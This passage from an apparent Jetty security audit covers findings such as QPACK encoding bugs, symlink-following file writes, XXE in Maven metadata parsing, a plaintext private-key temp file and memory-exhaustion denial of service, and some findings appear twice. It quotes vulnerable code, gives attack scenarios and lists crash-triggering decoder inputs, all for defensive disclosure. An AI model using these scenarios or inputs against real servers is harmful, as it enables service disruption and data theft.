31-1 (2.1 GB). He then repeatedly enters very large values into the server’s dynamic table using an “Insert with Literal Name” instruction until the full 2.1 GB capacity is taken up. The attacker repeats this using multiple connections until the server runs out of memory and crashes. Recommendations Short term, enforce the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit on the capacity. Long term, audit Jetty’s implementation of QPACK and other protocols to ensure that Jetty enforces limits as required by the standards. 78 OSTIF Eclipse: Jetty Security Assessment +12. LiteralNameEntryInstruction incorrectly encodes value length Severity: Medium Difficulty: Medium Type: Denial of Service Finding ID: TOB-JETTY-12 Target: org.eclipse.jetty.http3.qpack.internal.instruction.LiteralNameEntryI nstruction Description QPACK instructions for inserting entries with literal names and non-Huffman-coded values will be encoded incorrectly when the value’s length is over 30, which could cause values to be sent incorrectly or errors to occur during decoding. The following snippet of the LiteralNameEntryInstruction.encode function is responsible for encoding the header value: if (_huffmanValue) byteBuffer.put(( byte )( 0x80 )); NBitIntegerEncoder.encode(byteBuffer, 7 , HuffmanEncoder.octetsNeeded(_value)); HuffmanEncoder.encode(byteBuffer, _value); 78 79 { 80 81 82 83 } 84 85 { 86 87 88 89 } else byteBuffer.put(( byte )( 0x00 )); NBitIntegerEncoder.encode(byteBuffer, 5 , _value.length()); byteBuffer.put(_value.getBytes()); Figure 12.1: LiteralNameEntryInstruction.java , lines 78–89 On line 87, 5 is the second parameter to NBitIntegerEncoder.encode , indicating that the number will take up 5 bits in the first encoded byte; however, the second parameter should be 7 instead. This means that when _value.length() is over 30, it will be incorrectly encoded. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. 56 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, change the second parameter of the NBitIntegerEncoder.encode function from 5 to 7 in order to reflect that the number will take up 7 bits. Long term, write more tests to catch similar encoding/decoding problems. 57 OSTIF Eclipse: Jetty Security Assessment +13. FileInitializer does not check for symlinks Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-13 Target: org.eclipse.jetty.start.FileInitializer Description Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. During this process, the FileInitializer class validates the destination path and throws an IOException exception if the destination is outside the ${jetty.base} directory. However, this validation routine does not check for symlinks: // now on copy/download paths (be safe above all else) if (destination != null && !destination.startsWith(_basehome.getBasePath())) throw new IOException( "For security reasons, Jetty start is unable to process file resource not in ${jetty.base} - " + location); Figure 13.1: FileInitializer.java , lines 112–114 None of the subclasses of FileInitializer check for symlinks either. Thus, if the ${jetty.base} directory contains a symlink, a file path in a module’s .ini file beginning with the symlink name will pass the validation check, and the file will be written to a subdirectory of the symlink’s destination. Exploit Scenario A system’s ${jetty.base} directory contains a symlink called dir , which points to /etc . The system administrator enables a Jetty module whose .ini file contains a [files] entry that downloads a remote file and writes it to the relative path dir/config.conf . The filesystem follows the symlink and writes a new configuration file to /etc/config.conf , which impacts the server’s system configuration. Additionally, since the FileInitializer class uses the REPLACE_EXISTING flag, this behavior overwrites an existing system configuration file. Recommendations Short term, rewrite all path checks in FileInitializer and its subclasses to include a call to the Path.toRealPath function, which, by default, will resolve symlinks and produce the real filesystem path pointed to by the Path object. If this real path is outside ${jetty.base} , the file write operation should fail. 58 OSTIF Eclipse: Jetty Security Assessment Long term, consolidate all filesystem operations involving the ${jetty.base} or ${jetty.home} directories into a single centralized class that automatically performs symlink resolution and rejects operations that attempt to read from or write to an unauthorized directory. This class should catch and handle the IOException exception that is thrown in the event of a link loop or a large number of nested symlinks. 59 OSTIF Eclipse: Jetty Security Assessment +14. FileInitializer permits downloading files via plaintext HTTP Severity: High Difficulty: High Type: Data Exposure Finding ID: TOB-JETTY-14 Target: org.eclipse.jetty.start.FileInitializer Description Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. If the specified URL is a plaintext HTTP URL, Jetty does not raise an error or warn the user. Transmitting files over plaintext HTTP is intrinsically unsecure and exposes sensitive data to tampering and eavesdropping in transit. Exploit Scenario A system administrator enables a Jetty module that downloads a remote file over plaintext HTTP during initialization. An attacker with a network intermediary position sniffs the traffic and infers sensitive information about the design and configuration of the Jetty system under configuration. Alternatively, the attacker actively tampers with the file during transmission from the remote server to the Jetty installation, which enables the attacker to alter the module’s behavior and launch other attacks against the targeted system. Recommendations Short term, add a check to the FileInitializer class and its subclasses to prohibit downloads over plaintext HTTP. Additionally, add a validation check to the module .ini file parser to reject any configuration that includes a plaintext HTTP URL in the [files] section. Long term, consolidate all remote file downloads conducted during module configuration operations into a single centralized class that automatically rejects plaintext HTTP URLs. If current use cases require support of plaintext HTTP URLs, then at a minimum, have Jetty display a prominent warning message and prompt the user for manual confirmation before performing the unencrypted download. 60 OSTIF Eclipse: Jetty Security Assessment +15. NullPointerException thrown by FastCGI parser on invalid frame type Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-JETTY-15 Target: org.eclipse.jetty.fcgi.parser.Parser Description Because of a missing null check, the Jetty FastCGI client’s Parser class throws a NullPointerException exception when parsing a frame with an invalid frame type field. This exception occurs because the findContentParser function returns null when it does not have a ContentParser object matching the specified frame type, and the caller never checks the findContentParser return value for null before dereferencing it. case CONTENT: { ContentParser contentParser = findContentParser(headerParser.getFrameType()); if (headerParser.getContentLength() == 0 ) { padding = headerParser.getPaddingLength(); state = State.PADDING; if (contentParser.noContent()) return true ; } else { ContentParser.Result result = contentParser.parse(buffer); // ...[snip]... } break ; } Figure 15.1: Parser.java , lines 82–114 Exploit Scenario An attacker operates a malicious web server that supports FastCGI. A Jetty application communicates with this server by using Jetty’s built-in FastCGI client. The remote server transmits a frame with an invalid frame type, causing a NullPointerException exception and a crash in the Jetty application. Recommendations Short term, add a null check to the parse function to abort the parsing process before dereferencing a null return value from findContentParser . If a null value is detected, 61 OSTIF Eclipse: Jetty Security Assessment parse should throw an appropriate exception, such as IllegalStateException , that Jetty can catch and handle safely. Long term, build out a larger suite of test cases that ensures graceful handling of malformed traffic and data. 62 OSTIF Eclipse: Jetty Security Assessment +16. Documentation does not specify that request contents and other user data can be exposed in debug logs Severity: Medium Difficulty: High Type: Data Exposure Finding ID: TOB-JETTY-16 Target: Jetty 12 Operations Guide; numerous locations throughout the codebase Description Over 100 times, the system calls LOG.debug with a parameter of the format BufferUtil.toDetailString(buffer) , which outputs up to 56 bytes of the buffer into the log file. Jetty’s implementations of various protocols and encodings, including GZIP, WebSocket, multipart encoding, and HTTP/2, output user data received over the network to the debug log using this type of call. An example instance from Jetty’s WebSocket implementation appears in figure 16.1. public Frame.Parsed parse (ByteBuffer buffer) throws WebSocketException { try { // parse through while (buffer.hasRemaining()) { if (LOG.isDebugEnabled()) LOG.debug( "{} Parsing {}" , this , BufferUtil.toDetailString(buffer)); // ...[snip]... } // ...[snip]... } // ...[snip]... } Figure 16.1: Parser.java , lines 88–96 Although the Jetty 12 Operations Guide does state that Jetty debugging logs can quickly consume massive amounts of disk space, it does not advise system administrators that the logs can contain sensitive user data, such as personally identifiable information. Thus, the possibility of raw traffic being captured from debug logs is undocumented. Exploit Scenario A Jetty system administrator turns on debug logging in a production environment. During the normal course of operation, a user sends traffic containing sensitive information, such as personally identifiable information or financial data, and this data is recorded to the 63 OSTIF Eclipse: Jetty Security Assessment debug log. An attacker who gains access to this log can then read the user data, compromising data confidentiality and the user’s privacy rights. Recommendations Short term, update the Jetty Operations Guide to state that in addition to being extremely large, debug logs can contain sensitive user data and should be treated as sensitive. Long term, consider moving all debugging messages that contain buffer excerpts into a high-detail debug log that is enabled only for debug builds of the application. 64 OSTIF Eclipse: Jetty Security Assessment +17. HttpStreamOverFCGI internally marks all requests as plaintext HTTP Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-17 Target: org.eclipse.jetty.fcgi.server.internal.HttpStreamOverFCGI Description The HttpStreamOverFCGI class processes FastCGI messages in a format that can be processed by other system components that use the HttpStream interface. This class’s onHeaders callback mistakenly marks each MetaData.Request object as a plaintext HTTP request, as the “TODO” comment shown in figure 17.1 indicates: public void onHeaders () { String pathQuery = URIUtil.addPathQuery(_path, _query); // TODO https? MetaData.Request request = new MetaData.Request(_method, HttpScheme.HTTP.asString(), hostPort, pathQuery, HttpVersion.fromString(_version), _headers, Long.MIN_VALUE); // ...[snip]... } Figure 17.1: HttpStreamOverFCGI.java , lines 108–119 In some configurations, other Jetty components could misinterpret a message received over FCGI as a plaintext HTTP message, which could cause a request to be incorrectly rejected, redirected in an infinite loop, or forwarded to another system over a plaintext HTTP channel instead of HTTPS. Exploit Scenario A Jetty instance runs an FCGI server and uses the HttpStream interface to process messages. The MetaData.Request class’s getURI method is used to check the incoming request’s URI. This method mistakenly returns a plaintext HTTP URL due to the bug in HttpStreamOverFCGI.java . One of the following takes place during the processing of this request: ● ● An application-level security control checks the incoming request’s URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application rejects the request and refuses to process it, causing a denial of service. An application-level security control checks the incoming request’s URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application 65 OSTIF Eclipse: Jetty Security Assessment attempts to redirect the user to a suitable HTTPS URL. The check fails on this redirected request as well, causing an infinite redirect loop and a denial of service. ● An application processing FCGI messages acts as a proxy, forwarding certain requests to a third HTTP server. It uses MetaData.Request.getURI to check the request’s original URI and mistakenly sends a request over plaintext HTTP. Recommendations Short term, correct the bug in HttpStreamOverFCGI.java to generate the correct URI for the incoming request. Long term, consider streamlining the HTTP implementation to minimize the need for different classes to generate URIs from request data. 66 OSTIF Eclipse: Jetty Security Assessment +18. Excessively permissive and non-standards-compliant error handling in HTTP/2 implementation Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-18 Target: The org.eclipse.jetty.http2.parser and org.eclipse.jetty.http2.parser packages Description Jetty’s HTTP/2 implementation violates RFC 9113 in that it fails to terminate a connection with an appropriate error code when the remote peer sends a frame with one of the following protocol violations: ● ● ● A SETTINGS frame with the ACK flag set and a nonzero payload length A PUSH_PROMISE frame in a stream with push disabled A GOAWAY frame with its stream ID not set to zero None of these situations creates an exploitable vulnerability. However, noncompliant protocol implementations can create compatibility problems and could cause vulnerabilities when deployed in combination with other misconfigured systems. Exploit Scenario A Jetty instance connects to an HTTP/2 server, or serves a connection from an HTTP/2 client, and the remote peer sends traffic that should cause Jetty to terminate the connection. Instead, Jetty keeps the connection alive, in violation of RFC 9113. If the remote peer is programmed to handle the noncompliant traffic differently than Jetty, further problems could result, as the two implementations interpret protocol messages differently. Recommendations Short term, update the HTTP/2 implementation to check for the following error conditions and terminate the connection with an error code that complies with RFC 9113: ● ● A peer receives a SETTINGS frame with the ACK flag set and a payload length greater than zero. A client receives a PUSH_PROMISE frame after having sent, and received an acknowledgement for, a SETTINGS frame with SETTINGS_ENABLE_PUSH equal to zero. 67 OSTIF Eclipse: Jetty Security Assessment ● A peer receives a GOAWAY frame with the stream identifier field not set to zero. Long term, audit Jetty’s implementation of HTTP/2 and other protocols to ensure that Jetty handles errors in a standards-compliant manner and terminates connections as required by the applicable specifications. 68 OSTIF Eclipse: Jetty Security Assessment 19. XML external entities and entity expansion in Maven package metadata parser Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-19 Target: org.eclipse.jetty.start.fileinits.MavenMetadata Description During module initialization, the MavenMetadata class parses maven-metadata.xml files when the module configuration includes a maven:// URI in its [files] section. The DocumentBuilderFactory class is used with its default settings, meaning that document type definitions (DTD) are allowed and are applied. This behavior leaves the MavenMetadata class vulnerable to XML external entity (XXE) and XML entity expansion (XEE) attacks. These vulnerabilities could enable a variety of exploits, including server-side request forgery on the server’s local network and arbitrary file reads from the server’s filesystem. Exploit Scenario An attacker causes a Jetty installation to parse a maliciously crafted maven-metadata.xml file, such as by uploading a malicious package to a Maven repository, inducing an out-of-band download of the malicious package through social engineering, or by placing the maven-metadata.xml file on the server’s filesystem through other means. When the XML file is parsed, the XML-based attack is launched. The attacker could leverage this vector to do any of the following: ● ● ● Induce HTTP requests to servers on the server’s local network Read and exfiltrate arbitrary files on the server’s filesystem Consume excessive system resources with an XEE, causing a denial of service Recommendations Short term, disable parsing of DTDs in MavenMetadata so that maven-metadata.xml files cannot be used as a vector for XML-based attacks. Disabling DTDs may require knowledge of the underlying XML parser implementation returned by the DocumentBuilderFactory class. Long term, review default configurations and attributes supported by XML parsers that may be returned by the DocumentBuilderFactory to ensure that DTDs are properly disabled. 69 OSTIF Eclipse: Jetty Security Assessment 20. Use of deprecated AccessController class Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-20 Target: ● org.eclipse.jetty.logging.JettyLoggerConfiguration ● org.eclipse.jetty.util.MemoryUtils ● org.eclipse.jetty.util.TypeUtil ● org.eclipse.jetty.util.thread.PrivilegedThreadFactory ● org.eclipse.jetty.ee10.servlet.ServletContextHandler ● org.eclipse.jetty.ee9.nested.ContextHandler Description The classes listed in the “Target” cell above use the java.security.AccessController class, which is a deprecated class slated to be removed in a future Java release. The java.security library documentation states that the AccessController class “is only useful in conjunction with the Security Manager,” which is also deprecated. Thus, the use of AccessController no longer serves any beneficial purpose. The use of this deprecated class could impact Jetty’s compatibility with future releases of the Java SDK. Recommendations Short term, remove all uses of the AccessController class. Long term, audit the Jetty codebase for the use of classes in the java.security package that may not provide any value in Jetty 12, and remove all references to those classes. 70 OSTIF Eclipse: Jetty Security Assessment 21. QUIC server writes SSL private key to temporary plaintext file Severity: High Difficulty: High Type: Cryptography Finding ID: TOB-JETTY-21 Target: org.eclipse.jetty.quic.server.QuicServerConnector Description Jetty’s QUIC implementation uses quiche, a QUIC and HTTP/3 library maintained by Cloudflare. When the server’s SSL certificate is handed off to quiche, the private key is extracted from the existing keystore and written to a temporary plaintext PEM file: protected void doStart () throws Exception { // ...[snip]... char [] keyStorePassword = sslContextFactory.getKeyStorePassword().toCharArray(); String keyManagerPassword = sslContextFactory.getKeyManagerPassword(); SSLKeyPair keyPair = new SSLKeyPair( sslContextFactory.getKeyStoreResource().getPath(), sslContextFactory.getKeyStoreType(), keyStorePassword, alias, keyManagerPassword == null ? keyStorePassword : keyManagerPassword.toCharArray() ); File[] pemFiles = keyPair.export( new File(System.getProperty( "java.io.tmpdir" ))); privateKeyFile = pemFiles[ 0 ]; certificateChainFile = pemFiles[ 1 ]; } Figure 21.1: QuicServerConnector.java , lines 154–179 Storing the private key in this manner exposes it to increased risk of theft. Although the QuicServerConnector class deletes the private key file upon stopping the server, this deleted file may not be immediately removed from the physical storage medium, exposing the file to potential theft by attackers who can access the raw bytes on the disk. A review of quiche suggests that the library’s API may not support reading a DES-encrypted keyfile. If that is true, then remediating this issue would require updates to the underlying quiche library. 71 OSTIF Eclipse: Jetty Security Assessment Exploit Scenario An attacker gains read access to a Jetty HTTP/3 server’s temporary directory while the server is running. The attacker can retrieve the temporary keyfile and read the private key without needing to obtain or guess the encryption key for the original keystore. With this private key in hand, the attacker decrypts and tampers with all TLS communications that use the associated certificate. Recommendations Short term, investigate the quiche library’s API to determine whether it can readily support password-encrypted private keyfiles. If so, update Jetty to save the private key in a temporary password-protected file and to forward that password to quiche. Alternatively, if password-encrypted private keyfiles can be supported, have Jetty pass the unencrypted private key directly to quiche as a function argument. Either option would obviate the need to store the key in a plaintext file on the server’s filesystem. If quiche does not support either of these changes, open an issue or pull request for quiche to implement a fix for this issue. 72 OSTIF Eclipse: Jetty Security Assessment 22. Repeated code between HPACK and QPACK Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-22 Target: ● org.eclipse.jetty.http2.hpack.internal.NBitInteger ● org.eclipse.jetty.http2.hpack.internal.Huffman ● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerParser ● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerEncode ● org.eclipse.jetty.http3.qpack.internal.util.HuffmanDecoder ● org.eclipse.jetty.http3.qpack.internal.util.HuffmanEncoder Description Classes for dealing with n-bit integers and Huffman coding are implemented both in the jetty-http2-hpack and in jetty-http3-qpack libraries. These classes have very similar functionality but are implemented in two different places, sometimes with identical code and other times with different implementations. In some cases ( TOB-JETTY-9 ), one implementation has a bug that the other implementation does not have. The codebase would be easier to maintain and keep secure if the implementations were merged. Exploit Scenario A vulnerability is found in the Huffman encoding implementation, which has identical code in HPACK and QPACK. The vulnerability is fixed in one implementation but not the other, leaving one of the implementations vulnerable. Recommendations Short term, merge the two implementations of n-bit integers and Huffman coding classes. Long term, audit the Jetty codebase for other classes with very similar functionality. 73 OSTIF Eclipse: Jetty Security Assessment 23. Various exceptions in HpackDecoder.decode and QpackDecoder.decode Severity: Informational Difficulty: N/A Type: Denial of Service Finding ID: TOB-JETTY-23 Target: org.eclipse.jetty.http2.hpack.HpackDecoder , org.eclipse.jetty.http3.qpack.QpackDecoder Description The HpackDecoder and QpackDecoder classes both throw unexpected Java-level exceptions: ● HpackDecoder.decode(0x03) throws BufferUnderflowException . ● HpackDecoder.decode(0x4800) throws NumberFormatException . ● HpackDecoder.decode(0x3fff 2e) throws IllegalArgumentException . ● HpackDecoder.decode(0x3fff 81ff ff2e) throws NullPointerException . ● HpackDecoder.decode(0xffff ffff f8ff ffff ffff ffff ffff ffff ffff ffff ffff ffff 0202 0000) throws ArrayIndexOutOfBoundsException . ● QpackDecoder.decode(..., 0x81, ...) throws IndexOutOfBoundsException . ● QpackDecoder.decode(..., 0xfff8 ffff f75b, ...) throws ArithmeticException . For both HPACK and QPACK, these exceptions appear to be caught higher up in the call chain by catch (Throwable x) statements every time the decode functions are called. However, catching them within decode and throwing a Jetty-level exception within the catch statement would result in cleaner, more robust code. Exploit Scenario Jetty developers refactor the codebase, moving function calls around and introducing a new point in the code where HpackDecoder.decode is called. Assuming that decode will throw only org.jetty… errors, they forget to wrap this call in a catch (Throwable x) statement. This results in a DoS vulnerability. Recommendations Short term, document in the code that Java-level exceptions can be thrown. Long term, modify the decode functions so that they throw only Jetty-level exceptions. 74 OSTIF Eclipse: Jetty Security Assessment 24. Incorrect QPACK encoding when multi-byte characters are used Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-JETTY-24 Target: org.eclipse.jetty.http3.qpack.internal.EncodableEntry Description Java’s string.length() function returns the number of characters in a string, which can be different from the number of bytes returned by the string.getBytes() function. However, QPACK encoding methods assume that they return the same number, which could cause incorrect encodings. In EncodableEntry.LiteralEntry , which is used to encode HTTP/3 header fields, the following method is used for encoding: public void encode (ByteBuffer buffer, int base) 214 215 { 216 byte allowIntermediary = 0x00 ; // TODO: this is 0x10 bit, when should this be set? 217 218 219 220 221 222 223 224 String name = getName(); String value = getValue(); // Encode the prefix code and the name. if (_huffman) { buffer.put(( byte )( 0x28 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , HuffmanEncoder.octetsNeeded(name)); 225 226 227 HuffmanEncoder.encode(buffer, name); buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); 228 229 230 231 232 HuffmanEncoder.encode(buffer, value); } else { // TODO: What charset should we be using? (this applies to the instruction generators as well). 233 234 235 236 237 238 buffer.put(( byte )( 0x20 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , name.length()); buffer.put(name.getBytes()); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); 75 OSTIF Eclipse: Jetty Security Assessment 239 240 } } Figure 24.1: EncodableEntry.java , lines 214–240 Note in particular lines 232–238, which are used to encode literal (non-Huffman-coded) names and values. The value returned by name.length() is added to the bytestring, followed by the value returned by name.getBytes() . Then, the value returned by value.length() is added to the bytestring, followed by the value returned by value.getBytes() . When this bytestring is decoded, the decoder will read the name length field and then read that many bytes as the name. If multibyte characters were used in the name field, the decoder will read too few bytes. The rest of the bytestring will also be decoded incorrectly, since the decoder will continue reading at the wrong point in the bytestring. The same issue occurs if multibyte characters were used in the value field. The same issue appears in EncodableEntry.ReferencedNameEntry.encode : if (_huffman) 164 // Encode the value. 165 String value = getValue(); 166 167 { 168 169 170 171 } 172 173 { 174 175 176 177 } else buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); HuffmanEncoder.encode(buffer, value); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); Figure 24.2: EncodableEntry.java , lines 164–177 If value has multibyte characters, it will be incorrectly encoded in lines 174–176. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server attempts to add the Set-Cookie header, setting a cookie value to a UTF-8-encoded string that contains multibyte characters. This causes an incorrect cookie value to be set and the rest of the headers in this message to be parsed incorrectly. 76 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, have the encode function in both EncodableEntry.LiteralEntry and EncodableEntry.ReferencedNameEntry encode the length of the string using string.getBytes() rather than string.length() . 77 OSTIF Eclipse: Jetty Security Assessment 25. No limits on maximum capacity in QPACK decoder Severity: High Difficulty: Medium Type: Denial of Service Finding ID: TOB-JETTY-25 Target: ● org.eclipse.jetty.http3.qpack.QpackDecoder ● org.eclipse.jetty.http3.qpack.internal.parser.DecoderInstructi onParser ● org.eclipse.jetty.http3.qpack.internal.table.DynamicTable Description In QPACK, an encoder can set the dynamic table capacity of the decoder using a “Set Dynamic Table Capacity” instruction. The HTTP/3 specification requires that the capacity be no larger than the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit chosen by the decoder. However, nowhere in the QPACK code is this limit checked for. This means that the encoder can choose whatever capacity it wants (up to Java’s maximum integer value), allowing it to take up large amounts of space on the decoder’s memory. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server supporting QPACK is running. An attacker opens a connection to the server. He sends a “Set Dynamic Table Capacity” instruction, setting the dynamic table capacity to Java’s maximum integer value, 2 31-1 (2.1 GB). He then repeatedly enters very large values into the server’s dynamic table using an “Insert with Literal Name” instruction until the full 2.1 GB capacity is taken up. The attacker repeats this using multiple connections until the server runs out of memory and crashes. Recommendations Short term, enforce the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit on the capacity. Long term, audit Jetty’s implementation of QPACK and other protocols to ensure that Jetty enforces limits as required by the standards. 78 OSTIF Eclipse: Jetty Security Assessment +20. Use of deprecated AccessController class Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-20 Target: ● org.eclipse.jetty.logging.JettyLoggerConfiguration ● org.eclipse.jetty.util.MemoryUtils ● org.eclipse.jetty.util.TypeUtil ● org.eclipse.jetty.util.thread.PrivilegedThreadFactory ● org.eclipse.jetty.ee10.servlet.ServletContextHandler ● org.eclipse.jetty.ee9.nested.ContextHandler Description The classes listed in the “Target” cell above use the java.security.AccessController class, which is a deprecated class slated to be removed in a future Java release. The java.security library documentation states that the AccessController class “is only useful in conjunction with the Security Manager,” which is also deprecated. Thus, the use of AccessController no longer serves any beneficial purpose. The use of this deprecated class could impact Jetty’s compatibility with future releases of the Java SDK. Recommendations Short term, remove all uses of the AccessController class. Long term, audit the Jetty codebase for the use of classes in the java.security package that may not provide any value in Jetty 12, and remove all references to those classes. 70 OSTIF Eclipse: Jetty Security Assessment +21. QUIC server writes SSL private key to temporary plaintext file Severity: High Difficulty: High Type: Cryptography Finding ID: TOB-JETTY-21 Target: org.eclipse.jetty.quic.server.QuicServerConnector Description Jetty’s QUIC implementation uses quiche, a QUIC and HTTP/3 library maintained by Cloudflare. When the server’s SSL certificate is handed off to quiche, the private key is extracted from the existing keystore and written to a temporary plaintext PEM file: protected void doStart () throws Exception { // ...[snip]... char [] keyStorePassword = sslContextFactory.getKeyStorePassword().toCharArray(); String keyManagerPassword = sslContextFactory.getKeyManagerPassword(); SSLKeyPair keyPair = new SSLKeyPair( sslContextFactory.getKeyStoreResource().getPath(), sslContextFactory.getKeyStoreType(), keyStorePassword, alias, keyManagerPassword == null ? keyStorePassword : keyManagerPassword.toCharArray() ); File[] pemFiles = keyPair.export( new File(System.getProperty( "java.io.tmpdir" ))); privateKeyFile = pemFiles[ 0 ]; certificateChainFile = pemFiles[ 1 ]; } Figure 21.1: QuicServerConnector.java , lines 154–179 Storing the private key in this manner exposes it to increased risk of theft. Although the QuicServerConnector class deletes the private key file upon stopping the server, this deleted file may not be immediately removed from the physical storage medium, exposing the file to potential theft by attackers who can access the raw bytes on the disk. A review of quiche suggests that the library’s API may not support reading a DES-encrypted keyfile. If that is true, then remediating this issue would require updates to the underlying quiche library. 71 OSTIF Eclipse: Jetty Security Assessment Exploit Scenario An attacker gains read access to a Jetty HTTP/3 server’s temporary directory while the server is running. The attacker can retrieve the temporary keyfile and read the private key without needing to obtain or guess the encryption key for the original keystore. With this private key in hand, the attacker decrypts and tampers with all TLS communications that use the associated certificate. Recommendations Short term, investigate the quiche library’s API to determine whether it can readily support password-encrypted private keyfiles. If so, update Jetty to save the private key in a temporary password-protected file and to forward that password to quiche. Alternatively, if password-encrypted private keyfiles can be supported, have Jetty pass the unencrypted private key directly to quiche as a function argument. Either option would obviate the need to store the key in a plaintext file on the server’s filesystem. If quiche does not support either of these changes, open an issue or pull request for quiche to implement a fix for this issue. 72 OSTIF Eclipse: Jetty Security Assessment +22. Repeated code between HPACK and QPACK Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-22 Target: ● org.eclipse.jetty.http2.hpack.internal.NBitInteger ● org.eclipse.jetty.http2.hpack.internal.Huffman ● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerParser ● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerEncode ● org.eclipse.jetty.http3.qpack.internal.util.HuffmanDecoder ● org.eclipse.jetty.http3.qpack.internal.util.HuffmanEncoder Description Classes for dealing with n-bit integers and Huffman coding are implemented both in the jetty-http2-hpack and in jetty-http3-qpack libraries. These classes have very similar functionality but are implemented in two different places, sometimes with identical code and other times with different implementations. In some cases ( TOB-JETTY-9 ), one implementation has a bug that the other implementation does not have. The codebase would be easier to maintain and keep secure if the implementations were merged. Exploit Scenario A vulnerability is found in the Huffman encoding implementation, which has identical code in HPACK and QPACK. The vulnerability is fixed in one implementation but not the other, leaving one of the implementations vulnerable. Recommendations Short term, merge the two implementations of n-bit integers and Huffman coding classes. Long term, audit the Jetty codebase for other classes with very similar functionality. 73 OSTIF Eclipse: Jetty Security Assessment +23. Various exceptions in HpackDecoder.decode and QpackDecoder.decode Severity: Informational Difficulty: N/A Type: Denial of Service Finding ID: TOB-JETTY-23 Target: org.eclipse.jetty.http2.hpack.HpackDecoder , org.eclipse.jetty.http3.qpack.QpackDecoder Description The HpackDecoder and QpackDecoder classes both throw unexpected Java-level exceptions: ● HpackDecoder.decode(0x03) throws BufferUnderflowException . ● HpackDecoder.decode(0x4800) throws NumberFormatException . ● HpackDecoder.decode(0x3fff 2e) throws IllegalArgumentException . ● HpackDecoder.decode(0x3fff 81ff ff2e) throws NullPointerException . ● HpackDecoder.decode(0xffff ffff f8ff ffff ffff ffff ffff ffff ffff ffff ffff ffff 0202 0000) throws ArrayIndexOutOfBoundsException . ● QpackDecoder.decode(..., 0x81, ...) throws IndexOutOfBoundsException . ● QpackDecoder.decode(..., 0xfff8 ffff f75b, ...) throws ArithmeticException . For both HPACK and QPACK, these exceptions appear to be caught higher up in the call chain by catch (Throwable x) statements every time the decode functions are called. However, catching them within decode and throwing a Jetty-level exception within the catch statement would result in cleaner, more robust code. Exploit Scenario Jetty developers refactor the codebase, moving function calls around and introducing a new point in the code where HpackDecoder.decode is called. Assuming that decode will throw only org.jetty… errors, they forget to wrap this call in a catch (Throwable x) statement. This results in a DoS vulnerability. Recommendations Short term, document in the code that Java-level exceptions can be thrown. Long term, modify the decode functions so that they throw only Jetty-level exceptions. 74 OSTIF Eclipse: Jetty Security Assessment +24. Incorrect QPACK encoding when multi-byte characters are used Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-JETTY-24 Target: org.eclipse.jetty.http3.qpack.internal.EncodableEntry Description Java’s string.length() function returns the number of characters in a string, which can be different from the number of bytes returned by the string.getBytes() function. However, QPACK encoding methods assume that they return the same number, which could cause incorrect encodings. In EncodableEntry.LiteralEntry , which is used to encode HTTP/3 header fields, the following method is used for encoding: public void encode (ByteBuffer buffer, int base) 214 215 { 216 byte allowIntermediary = 0x00 ; // TODO: this is 0x10 bit, when should this be set? 217 218 219 220 221 222 223 224 String name = getName(); String value = getValue(); // Encode the prefix code and the name. if (_huffman) { buffer.put(( byte )( 0x28 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , HuffmanEncoder.octetsNeeded(name)); 225 226 227 HuffmanEncoder.encode(buffer, name); buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); 228 229 230 231 232 HuffmanEncoder.encode(buffer, value); } else { // TODO: What charset should we be using? (this applies to the instruction generators as well). 233 234 235 236 237 238 buffer.put(( byte )( 0x20 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , name.length()); buffer.put(name.getBytes()); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); 75 OSTIF Eclipse: Jetty Security Assessment 239 240 } } Figure 24.1: EncodableEntry.java , lines 214–240 Note in particular lines 232–238, which are used to encode literal (non-Huffman-coded) names and values. The value returned by name.length() is added to the bytestring, followed by the value returned by name.getBytes() . Then, the value returned by value.length() is added to the bytestring, followed by the value returned by value.getBytes() . When this bytestring is decoded, the decoder will read the name length field and then read that many bytes as the name. If multibyte characters were used in the name field, the decoder will read too few bytes. The rest of the bytestring will also be decoded incorrectly, since 